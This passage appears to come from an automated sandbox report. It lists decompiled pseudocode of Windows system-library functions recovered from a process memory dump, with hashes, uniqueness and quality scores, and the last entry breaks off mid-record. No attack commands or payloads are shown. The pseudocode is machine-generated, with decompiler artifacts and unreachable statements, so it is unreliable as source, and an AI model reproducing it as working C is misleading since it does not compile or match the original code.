                        • Instruction ID: 09cfa7c9bebe595fef7bf1648937299959d314e6e591017ab8ef8e3b2f3385d0
                        • Opcode Fuzzy Hash: a75ed00be1a5534979e99bf723580cc2709513597a5e61aecfbe630432c3f3e5
                        • Instruction Fuzzy Hash: A5319071605615DBC7258F2DC891ABABBF5EF85700B0584EAE849CB391F770D840CFA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E02C17016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                        				signed int _v8;
                        				char _v588;
                        				intOrPtr _v592;
                        				intOrPtr _v596;
                        				signed short* _v600;
                        				char _v604;
                        				short _v606;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed short* _t55;
                        				void* _t56;
                        				signed short* _t58;
                        				signed char* _t61;
                        				char* _t68;
                        				void* _t69;
                        				void* _t71;
                        				void* _t72;
                        				signed int _t75;
                        
                        				_t64 = __edx;
                        				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                        				_v8 =  *0x2c8d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                        				_t55 = _a16;
                        				_v606 = __ecx;
                        				_t71 = 0;
                        				_t58 = _a12;
                        				_v596 = __edx;
                        				_v600 = _t58;
                        				_t68 =  &_v588;
                        				if(_t58 != 0) {
                        					_t71 = ( *_t58 & 0x0000ffff) + 2;
                        					if(_t55 != 0) {
                        						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                        					}
                        				}
                        				_t8 = _t71 + 0x2a; // 0x28
                        				_t33 = _t8;
                        				_v592 = _t8;
                        				if(_t71 <= 0x214) {
                        					L6:
                        					 *((short*)(_t68 + 6)) = _v606;
                        					if(_t64 != 0xffffffff) {
                        						asm("cdq");
                        						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                        						 *((char*)(_t68 + 0x28)) = _a4;
                        						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                        						 *((char*)(_t68 + 0x29)) = _a8;
                        						if(_t71 != 0) {
                        							_t22 = _t68 + 0x2a; // 0x2a
                        							_t64 = _t22;
                        							E02C16B4C(_t58, _t22, _t71,  &_v604);
                        							if(_t55 != 0) {
                        								_t25 = _v604 + 0x2a; // 0x2a
                        								_t64 = _t25 + _t68;
                        								E02C16B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                        							}
                        							if(E02BB7D50() == 0) {
                        								_t61 = 0x7ffe0384;
                        							} else {
                        								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        							}
                        							_push(_t68);
                        							_push(_v592 + 0xffffffe0);
                        							_push(0x402);
                        							_push( *_t61 & 0x000000ff);
                        							E02BD9AE0();
                        						}
                        					}
                        					_t35 =  &_v588;
                        					if( &_v588 != _t68) {
                        						_t35 = L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                        					}
                        					L16:
                        					_pop(_t69);
                        					_pop(_t72);
                        					_pop(_t56);
                        					return E02BDB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                        				}
                        				_t68 = L02BB4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                        				if(_t68 == 0) {
                        					goto L16;
                        				} else {
                        					_t58 = _v600;
                        					_t64 = _v596;
                        					goto L6;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • Opcode ID: ff827c4154e987613a001c1244f0c7b858bf2b9f651ffb1d05f768868374b59a
                        • Instruction ID: 50218eb351b2973a92bdf93c7d3539388084723355bf1007f7324d1ab278a25b
                        • Opcode Fuzzy Hash: ff827c4154e987613a001c1244f0c7b858bf2b9f651ffb1d05f768868374b59a
                        • Instruction Fuzzy Hash: 6931C4726047519BC321DF28CC41AAAF3E9FFC9700F144A29F89987690E730E904DBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E02BBC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                        				signed int* _v8;
                        				char _v16;
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t33;
                        				signed char _t43;
                        				signed char _t48;
                        				signed char _t62;
                        				void* _t63;
                        				intOrPtr _t69;
                        				intOrPtr _t71;
                        				unsigned int* _t82;
                        				void* _t83;
                        
                        				_t80 = __ecx;
                        				_t82 = __edx;
                        				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                        				_t62 = _t33 >> 0x00000001 & 0x00000001;
                        				if((_t33 & 0x00000001) != 0) {
                        					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                        					if(E02BB7D50() != 0) {
                        						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        					} else {
                        						_t43 = 0x7ffe0386;
                        					}
                        					if( *_t43 != 0) {
                        						_t43 = E02C68D34(_v8, _t80);
                        					}
                        					E02BB2280(_t43, _t82);
                        					if( *((char*)(_t80 + 0xdc)) == 0) {
                        						E02BAFFB0(_t62, _t80, _t82);
                        						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                        						_t30 = _t80 + 0xd0; // 0xd0
                        						_t83 = _t30;
                        						E02C68833(_t83,  &_v16);
                        						_t81 = _t80 + 0x90;
                        						E02BAFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                        						_t63 = 0;
                        						_push(0);
                        						_push(_t83);
                        						_t48 = E02BDB180();
                        						if(_a4 != 0) {
                        							E02BB2280(_t48, _t81);
                        						}
                        					} else {
                        						_t69 = _v8;
                        						_t12 = _t80 + 0x98; // 0x98
                        						_t13 = _t69 + 0xc; // 0x575651ff
                        						E02BBBB2D(_t13, _t12);
                        						_t71 = _v8;
                        						_t15 = _t80 + 0xb0; // 0xb0
                        						_t16 = _t71 + 8; // 0x8b000cc2
                        						E02BBBB2D(_t16, _t15);
                        						E02BBB944(_v8, _t62);
                        						 *((char*)(_t80 + 0xdc)) = 0;
                        						E02BAFFB0(0, _t80, _t82);
                        						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                        						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                        						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                        						 *(_t80 + 0xde) = 0;
                        						if(_a4 == 0) {
                        							_t25 = _t80 + 0x90; // 0x90
                        							E02BAFFB0(0, _t80, _t25);
                        						}
                        						_t63 = 1;
                        					}
                        					return _t63;
                        				}
                        				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                        				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                        				if(_a4 == 0) {
                        					_t24 = _t80 + 0x90; // 0x90
                        					E02BAFFB0(0, __ecx, _t24);
                        				}
                        				return 0;
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction ID: a44b99e463e857655bd0b5cfe6e4568448aa79d04f67dd1bd731f620613864a5
                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction Fuzzy Hash: 6A314472A01646BFD706EBB0C490BF9FB55BF52304F04819BC4189B201DBB5AA4ADBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 70%
                        			E02C43D40(intOrPtr __ecx, char* __edx) {
                        				signed int _v8;
                        				char* _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				signed char _v24;
                        				char _v28;
                        				char _v29;
                        				intOrPtr* _v32;
                        				char _v36;
                        				char _v37;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed char _t34;
                        				intOrPtr* _t37;
                        				intOrPtr* _t42;
                        				intOrPtr* _t47;
                        				intOrPtr* _t48;
                        				intOrPtr* _t49;
                        				char _t51;
                        				void* _t52;
                        				intOrPtr* _t53;
                        				char* _t55;
                        				char _t59;
                        				char* _t61;
                        				intOrPtr* _t64;
                        				void* _t65;
                        				char* _t67;
                        				void* _t68;
                        				signed int _t70;
                        
                        				_t62 = __edx;
                        				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                        				_v8 =  *0x2c8d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                        				_t34 =  &_v28;
                        				_v20 = __ecx;
                        				_t67 = __edx;
                        				_v24 = _t34;
                        				_t51 = 0;
                        				_v12 = __edx;
                        				_v29 = 0;
                        				_v28 = _t34;
                        				E02BB2280(_t34, 0x2c88a6c);
                        				_t64 =  *0x2c85768; // 0x77ad5768
                        				if(_t64 != 0x2c85768) {
                        					while(1) {
                        						_t8 = _t64 + 8; // 0x77ad5770
                        						_t42 = _t8;
                        						_t53 = _t64;
                        						 *_t42 =  *_t42 + 1;
                        						_v16 = _t42;
                        						E02BAFFB0(_t53, _t64, 0x2c88a6c);
                        						 *0x2c8b1e0(_v24, _t67);
                        						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                        							_v37 = 1;
                        						}
                        						E02BB2280(_t45, 0x2c88a6c);
                        						_t47 = _v28;
                        						_t64 =  *_t64;
                        						 *_t47 =  *_t47 - 1;
                        						if( *_t47 != 0) {
                        							goto L8;
                        						}
                        						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                        							L10:
                        							_push(3);
                        							asm("int 0x29");
                        						} else {
                        							_t48 =  *((intOrPtr*)(_t53 + 4));
                        							if( *_t48 != _t53) {
                        								goto L10;
                        							} else {
                        								 *_t48 = _t64;
                        								_t61 =  &_v36;
                        								 *((intOrPtr*)(_t64 + 4)) = _t48;
                        								_t49 = _v32;
                        								if( *_t49 != _t61) {
                        									goto L10;
                        								} else {
                        									 *_t53 = _t61;
                        									 *((intOrPtr*)(_t53 + 4)) = _t49;
                        									 *_t49 = _t53;
                        									_v32 = _t53;
                        									goto L8;
                        								}
                        							}
                        						}
                        						L11:
                        						_t51 = _v29;
                        						goto L12;
                        						L8:
                        						if(_t64 != 0x2c85768) {
                        							_t67 = _v20;
                        							continue;
                        						}
                        						goto L11;
                        					}
                        				}
                        				L12:
                        				E02BAFFB0(_t51, _t64, 0x2c88a6c);
                        				while(1) {
                        					_t37 = _v28;
                        					_t55 =  &_v28;
                        					if(_t37 == _t55) {
                        						break;
                        					}
                        					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                        						goto L10;
                        					} else {
                        						_t59 =  *_t37;
                        						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                        							goto L10;
                        						} else {
                        							_t62 =  &_v28;
                        							_v28 = _t59;
                        							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                        							continue;
                        						}
                        					}
                        					L18:
                        				}
                        				_pop(_t65);
                        				_pop(_t68);
                        				_pop(_t52);
                        				return E02BDB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                        				goto L18;
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • Opcode ID: 38e35dc39a05325b8cc7a4258b82e89c05300f1fe79d8e3e003e52c9d2211acf
                        • Instruction ID: eae1140dc6a73a2f19de73fc827b064e621823203f04d03c250abc496d7a83ca
                        • Opcode Fuzzy Hash: 38e35dc39a05325b8cc7a4258b82e89c05300f1fe79d8e3e003e52c9d2211acf
                        • Instruction Fuzzy Hash: F831677150A382CFCB14DF14C88096ABBF1BFC5708F5589AEE4998B280DB30DE04CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E02BCA70E(intOrPtr* __ecx, char* __edx) {
                        				unsigned int _v8;
                        				intOrPtr* _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t16;
                        				intOrPtr _t17;
                        				intOrPtr _t28;
                        				char* _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t38;
                        				void* _t50;
                        				intOrPtr _t52;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t52 =  *0x2c87b10; // 0x8
                        				_t33 = __edx;
                        				_t48 = __ecx;
                        				_v12 = __ecx;
                        				if(_t52 == 0) {
                        					 *0x2c87b10 = 8;
                        					 *0x2c87b14 = 0x2c87b0c;
                        					 *0x2c87b18 = 1;
                        					L6:
                        					_t2 = _t52 + 1; // 0x9
                        					E02BCA990(0x2c87b10, _t2, 7);
                        					asm("bts ecx, eax");
                        					 *_t48 = _t52;
                        					 *_t33 = 1;
                        					L3:
                        					_t16 = 0;
                        					L4:
                        					return _t16;
                        				}
                        				_t17 = L02BCA840(__edx, __ecx, __ecx, _t52, 0x2c87b10, 1, 0);
                        				if(_t17 == 0xffffffff) {
                        					_t37 =  *0x2c87b10; // 0x8
                        					_t3 = _t37 + 0x27; // 0x2f
                        					__eflags = _t3 >> 5 -  *0x2c87b18; // 0x1
                        					if(__eflags > 0) {
                        						_t38 =  *0x2c87b9c; // 0x0
                        						_t4 = _t52 + 0x27; // 0x2f
                        						_v8 = _t4 >> 5;
                        						_t50 = L02BB4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                        						__eflags = _t50;
                        						if(_t50 == 0) {
                        							_t16 = 0xc0000017;
                        							goto L4;
                        						}
                        						 *0x2c87b18 = _v8;
                        						_t8 = _t52 + 7; // 0xf
                        						E02BDF3E0(_t50,  *0x2c87b14, _t8 >> 3);
                        						_t28 =  *0x2c87b14; // 0x77ad7b0c
                        						__eflags = _t28 - 0x2c87b0c;
                        						if(_t28 != 0x2c87b0c) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                        						}
                        						_t9 = _t52 + 8; // 0x10
                        						 *0x2c87b14 = _t50;
                        						_t48 = _v12;
                        						 *0x2c87b10 = _t9;
                        						goto L6;
                        					}
                        					 *0x2c87b10 = _t37 + 8;
                        					goto L6;
                        				}
                        				 *__ecx = _t17;
                        				 *_t33 = 0;
                        				goto L3;
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 02075187100ff5e6de847239d733a3c7574f90b611f4713feacc8a37428223dc
                        • Instruction ID: bf6a43aa90da66abe8b356ed922bbd347bfeb0afe03ef51c9434902f27a0cd56
                        • Opcode Fuzzy Hash: 02075187100ff5e6de847239d733a3c7574f90b611f4713feacc8a37428223dc
                        • Instruction Fuzzy Hash: 543181B9A40208DBD711CF18DC90F75B7FAFB84710F348EAAE01597240E771A915CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 95%
                        			E02B9AA16(signed short* __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				signed short _v16;
                        				intOrPtr _v20;
                        				signed short _v24;
                        				signed short _v28;
                        				void* _v32;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t25;
                        				signed short _t38;
                        				signed short* _t42;
                        				signed int _t44;
                        				signed short* _t52;
                        				signed short _t53;
                        				signed int _t54;
                        
                        				_v8 =  *0x2c8d360 ^ _t54;
                        				_t42 = __ecx;
                        				_t44 =  *__ecx & 0x0000ffff;
                        				_t52 =  &(__ecx[2]);
                        				_t51 = _t44 + 2;
                        				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                        					L4:
                        					_t25 =  *0x2c87b9c; // 0x0
                        					_t53 = L02BB4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                        					__eflags = _t53;
                        					if(_t53 == 0) {
                        						L3:
                        						return E02BDB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                        					} else {
                        						E02BDF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                        						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                        						L2:
                        						_t51 = 4;
                        						if(L02BA6C59(_t53, _t51, _t58) != 0) {
                        							_t28 = E02BC5E50(0x2b7c338, 0, 0,  &_v32);
                        							__eflags = _t28;
                        							if(_t28 == 0) {
                        								_t38 = ( *_t42 & 0x0000ffff) + 2;
                        								__eflags = _t38;
                        								_v24 = _t53;
                        								_v16 = _t38;
                        								_v20 = 0;
                        								_v12 = 0;
                        								E02BCB230(_v32, _v28, 0x2b7c2d8, 1,  &_v24);
                        								_t28 = E02B9F7A0(_v32, _v28);
                        							}
                        							__eflags = _t53 -  *_t52;
                        							if(_t53 !=  *_t52) {
                        								_t28 = L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                        							}
                        						}
                        						goto L3;
                        					}
                        				}
                        				_t53 =  *_t52;
                        				_t44 = _t44 >> 1;
                        				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                        				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                        					goto L4;
                        				}
                        				goto L2;
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b308aecd1f9c1c9c4ba62401bdd44bd5a6985037dc1d3c702a08af10fe5951ae
                        • Instruction ID: 928e7b3471efc19232d2b1cad5444a43e267e27a1f904502de460b931e685ea8
                        • Opcode Fuzzy Hash: b308aecd1f9c1c9c4ba62401bdd44bd5a6985037dc1d3c702a08af10fe5951ae
                        • Instruction Fuzzy Hash: 0331D572A00219ABDF119F64CD81ABFB7B9FF04700F1544AAF912EB150EB749D11DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 97%
                        			E02BC61A0(signed int* __ecx) {
                        				intOrPtr _v8;
                        				char _v12;
                        				intOrPtr* _v16;
                        				intOrPtr _v20;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				void* _t32;
                        				intOrPtr _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t49;
                        				signed int _t51;
                        				intOrPtr _t52;
                        				signed int _t54;
                        				void* _t59;
                        				signed int* _t61;
                        				intOrPtr* _t64;
                        
                        				_t61 = __ecx;
                        				_v12 = 0;
                        				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                        				_v16 = __ecx;
                        				_v8 = 0;
                        				if(_t30 == 0) {
                        					L6:
                        					_t31 = 0;
                        					L7:
                        					return _t31;
                        				}
                        				_t32 = _t30 + 0x5d8;
                        				if(_t32 == 0) {
                        					goto L6;
                        				}
                        				_t59 = _t32 + 0x30;
                        				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                        					goto L6;
                        				}
                        				if(__ecx != 0) {
                        					 *((intOrPtr*)(__ecx)) = 0;
                        					 *((intOrPtr*)(__ecx + 4)) = 0;
                        				}
                        				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                        					_t51 =  *(_t32 + 0x10);
                        					_t33 = _t32 + 0x10;
                        					_v20 = _t33;
                        					_t54 =  *(_t33 + 4);
                        					if((_t51 | _t54) == 0) {
                        						_t37 = E02BC5E50(0x2b767cc, 0, 0,  &_v12);
                        						if(_t37 != 0) {
                        							goto L6;
                        						}
                        						_t52 = _v8;
                        						asm("lock cmpxchg8b [esi]");
                        						_t64 = _v16;
                        						_t49 = _t37;
                        						_v20 = 0;
                        						if(_t37 == 0) {
                        							if(_t64 != 0) {
                        								 *_t64 = _v12;
                        								 *((intOrPtr*)(_t64 + 4)) = _t52;
                        							}
                        							E02C69D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                        							_t31 = 1;
                        							goto L7;
                        						}
                        						E02B9F7C0(_t52, _v12, _t52, 0);
                        						if(_t64 != 0) {
                        							 *_t64 = _t49;
                        							 *((intOrPtr*)(_t64 + 4)) = _v20;
                        						}
                        						L12:
                        						_t31 = 1;
                        						goto L7;
                        					}
                        					if(_t61 != 0) {
                        						 *_t61 = _t51;
                        						_t61[1] = _t54;
                        					}
                        					goto L12;
                        				} else {
                        					goto L6;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 92c48f08cdc1a635cfb12cb70ea4960bca24c836f5c0dd61d20462d890d6a307
                        • Instruction ID: 62b2643e95c32e55330bcdd4dd67b662551dcc93234dec86c858e1a2dad760a1
                        • Opcode Fuzzy Hash: 92c48f08cdc1a635cfb12cb70ea4960bca24c836f5c0dd61d20462d890d6a307
                        • Instruction Fuzzy Hash: 67319C71A057018FD324CF59C840B26F7E9FB88B04F1449ADE995DB391E770E944CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E02BD4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				signed int* _v12;
                        				char _v13;
                        				signed int _v16;
                        				char _v21;
                        				signed int* _v24;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t29;
                        				signed int* _t32;
                        				signed int* _t41;
                        				signed int _t42;
                        				void* _t43;
                        				intOrPtr* _t51;
                        				void* _t52;
                        				signed int _t53;
                        				signed int _t58;
                        				void* _t59;
                        				signed int _t60;
                        				signed int _t62;
                        
                        				_t49 = __edx;
                        				_t62 = (_t60 & 0xfffffff8) - 0xc;
                        				_t26 =  *0x2c8d360 ^ _t62;
                        				_v8 =  *0x2c8d360 ^ _t62;
                        				_t41 = __ecx;
                        				_t51 = __edx;
                        				_v12 = __ecx;
                        				if(_a4 == 0) {
                        					if(_a8 != 0) {
                        						goto L1;
                        					}
                        					_v13 = 1;
                        					E02BB2280(_t26, 0x2c88608);
                        					_t58 =  *_t41;
                        					if(_t58 == 0) {
                        						L11:
                        						E02BAFFB0(_t41, _t51, 0x2c88608);
                        						L2:
                        						 *0x2c8b1e0(_a4, _a8);
                        						_t42 =  *_t51();
                        						if(_t42 == 0) {
                        							_t29 = 0;
                        							L5:
                        							_pop(_t52);
                        							_pop(_t59);
                        							_pop(_t43);
                        							return E02BDB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                        						}
                        						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                        						if(_v21 != 0) {
                        							_t53 = 0;
                        							E02BB2280(_t28, 0x2c88608);
                        							_t32 = _v24;
                        							if( *_t32 == _t58) {
                        								 *_t32 = _t42;
                        								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                        								if(_t58 != 0) {
                        									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                        									asm("sbb edi, edi");
                        									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                        								}
                        							}
                        							E02BAFFB0(_t42, _t53, 0x2c88608);
                        							if(_t53 != 0) {
                        								L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                        							}
                        						}
                        						_t29 = _t42;
                        						goto L5;
                        					}
                        					if( *((char*)(_t58 + 0x40)) != 0) {
                        						L10:
                        						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                        						E02BAFFB0(_t41, _t51, 0x2c88608);
                        						_t29 = _t58;
                        						goto L5;
                        					}
                        					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                        					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                        						goto L11;
                        					}
                        					goto L10;
                        				}
                        				L1:
                        				_v13 = 0;
                        				_t58 = 0;
                        				goto L2;
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bef339e1a5a2e00b4f90f439e76969279fc54cdd2f82a6ba751ada63e772911d
                        • Instruction ID: 8659353ed977fd29d19bfec707f0b499cd9a28e0a1e07aaeb866b39ca1213c22
                        • Opcode Fuzzy Hash: bef339e1a5a2e00b4f90f439e76969279fc54cdd2f82a6ba751ada63e772911d
                        • Instruction Fuzzy Hash: FF3100322053509BD731AF14C980BAABBF5FFC5B14F4085A9E8664BA80EBB0D800DB85
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E02BD8EC7(void* __ecx, void* __edx) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				char* _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				signed int* _v44;
                        				intOrPtr _v48;
                        				intOrPtr _v52;
                        				intOrPtr _v56;
                        				signed int* _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				intOrPtr _v72;
                        				char* _v76;
                        				intOrPtr _v80;
                        				signed int _v84;
                        				intOrPtr _v88;
                        				intOrPtr _v92;
                        				intOrPtr _v96;
                        				intOrPtr _v100;
                        				intOrPtr _v104;
                        				signed int* _v108;
                        				char _v140;
                        				signed int _v144;
                        				signed int _v148;
                        				intOrPtr _v152;
                        				char _v156;
                        				intOrPtr _v160;
                        				char _v164;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t67;
                        				intOrPtr _t70;
                        				void* _t71;
                        				void* _t72;
                        				signed int _t73;
                        
                        				_t69 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t73;
                        				_t48 =  *[fs:0x30];
                        				_t72 = __edx;
                        				_t71 = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                        					_t48 = E02BC4E70(0x2c886e4, 0x2bd9490, 0, 0);
                        					if( *0x2c853e8 > 5 && E02BD8F33(0x2c853e8, 0, 0x2000) != 0) {
                        						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                        						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                        						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                        						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                        						_v108 =  &_v84;
                        						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                        						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                        						_v76 =  &_v156;
                        						_t70 = 8;
                        						_v60 =  &_v144;
                        						_t67 = 4;
                        						_v44 =  &_v148;
                        						_v152 = 0;
                        						_v160 = 0;
                        						_v104 = 0;
                        						_v100 = 2;
                        						_v96 = 0;
                        						_v88 = 0;
                        						_v80 = 0;
                        						_v72 = 0;
                        						_v68 = _t70;
                        						_v64 = 0;
                        						_v56 = 0;
                        						_v52 = 0x2c853e8;
                        						_v48 = 0;
                        						_v40 = 0;
                        						_v36 = 0x2c853e8;
                        						_v32 = 0;
                        						_v28 =  &_v164;
                        						_v24 = 0;
                        						_v20 = _t70;
                        						_v16 = 0;
                        						_t69 = 0x2b7bc46;
                        						_t48 = E02C17B9C(0x2c853e8, 0x2b7bc46, _t67, 0x2c853e8, _t70,  &_v140);
                        					}
                        				}
                        				return E02BDB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 41bb8382c6a9f8d6a928763dc1fd9a54a258b49f9343ead0e9924b676d47a0b1
                        • Instruction ID: 45ac308656bcbebced1f52e6ddd388e4ce0013fceb6b2fc7d5830653f8db919f
                        • Opcode Fuzzy Hash: 41bb8382c6a9f8d6a928763dc1fd9a54a258b49f9343ead0e9924b676d47a0b1
